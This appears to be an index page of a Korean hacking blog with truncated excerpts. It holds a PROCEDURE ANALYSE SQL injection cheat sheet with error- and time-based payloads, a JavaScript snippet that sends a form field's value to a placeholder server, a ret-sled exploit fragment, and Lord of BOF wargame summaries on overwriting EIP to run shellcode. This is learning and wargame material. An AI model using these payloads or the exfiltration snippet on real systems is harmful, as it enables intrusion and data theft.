분류 전체보기
-
PROCEDURE ANALYSE - SQLiHACK/WEB 2018. 8. 3. 20:57
아래 Cheat Sheet 는 Input Vector 가 LIMIT 절 이후에 올 경우 유용하게 쓰입니다.Error based SQLiSELECT myColumn FROM myTable WHERE 1=1 LIMIT 0,1 PROCEDURE ANALYSE(extractvalue(rand(), concat(0x3A, version()), 1); Output: ERROR 1105 (HY000): XPATH syntax error: ':10.1.33-MariaDB' Time based SQLiSELECT myColumn FROM myTable WHERE 1=1 LIMIT 0,1 PROCEDURE ANALYSE(extractvalue(rand(), concat(0x3A, (IF(mid(version(), 1, 1..
-
JavaScript - CSRFHACK/WEB 2018. 7. 18. 21:16
CSRF(getElementsByName) window.onload=function(){m=[`http://my_server/`,document.getElementsByName(`my_name`)[0].value].join(``);(new Image).src=m;}; window.onload=function(){ m = [`http://my_server/`, document.getElementsByName(`my_name`)[0].value].join(``); (new Image).src=m; };
-
Retsled + FindenvHACK/PWNABLE 2018. 7. 17. 21:39
RET Sleding + Find Enviroment #include int main() { char *environ[] = { "E1", "E2", "E3", "E4", "E5", "E6", "E7", "E8", "E9", "E10", "E11", "E12", "E12", "E13", "E14", "E15", "E16", "E17", "E18", "E19", "E20", "E21", "E22", "E23", "E24", "E25", "E26", "E27", "E28", "E29", "E30", 0}; // ret- 0x0804848f // add esp,0x114- 0x08048484 char *argv[] = {"hack","\x8f\x84\x04\x08\x8f\x84\x04\x08\x8f\x84\x..
-
-
Lord of BOF - Challenge [9번] Troll -> VampireWARGAME/LORD OF BOF 2018. 7. 4. 18:32
[Summary]1. 39행의 취약한 strcpy 함수를 이용하여 40 바이트의 buffer 배열에 40바이트 이상의 값을 입력함으로써 EIP 레지스터를 덮어씌울 수 있다. 2. argv[0] 위치에 쉘코드를 위치 시킬 수 있다. 3. buffer 배열에 dummy(44) 입력시킨 후 EIP 레지스터를 argv[0] 의 주소로 변조하여 ShellCode를 실행시킨다. 4. 프로그램 실행 권한의 쉘을 획득하여 flag를 획득한다.[Sourcecode]/* The Lord of the BOF : The Fellowship of the BOF - vampire - check 0xbfff */ #include #include main(int argc, char *argv[]) { char buffer[40]; ..
-
Lord of BOF - Challenge [8번] Orge -> TrollWARGAME/LORD OF BOF 2018. 7. 4. 17:39
[Summary]1. 39행의 취약한 strcpy 함수를 이용하여 40 바이트의 buffer 배열에 40바이트 이상의 값을 입력함으로써 EIP 레지스터를 덮어씌울 수 있다.2. argv[0] 위치에 쉘코드를 위치 시킬 수 있다.3. buffer 배열에 dummy(44) 입력시킨 후 EIP 레지스터를 argv[0] 의 주소로 변조하여 ShellCode를 실행시킨다.4. 프로그램 실행 권한의 쉘을 획득하여 flag를 획득한다.[Sourcecode]/* The Lord of the BOF : The Fellowship of the BOF - troll - check argc + argv hunter */ #include #include extern char **environ; main(int argc, cha..
-
Lord of BOF - Challenge [7번] Darkelf -> OrgeWARGAME/LORD OF BOF 2018. 7. 4. 16:13
[Summary]1. 44행의 취약한 strcpy 함수를 이용하여 40 바이트의 buffer 배열에 40바이트 이상의 값을 입력함으로써 EIP 레지스터를 덮어씌울 수 있다.2. argv[0] 위치에 쉘코드를 위치 시킬 수 있다.3. buffer 배열에 dummy(44) 입력시킨 후 EIP 레지스터를 argv[0] 의 주소로 변조하여 ShellCode를 실행시킨다.4. 프로그램 실행 권한의 쉘을 획득하여 flag를 획득한다.[Sourcecode]/* The Lord of the BOF : The Fellowship of the BOF - orge - check argv[0] */ #include #include extern char **environ; main(int argc, char *argv[]) {..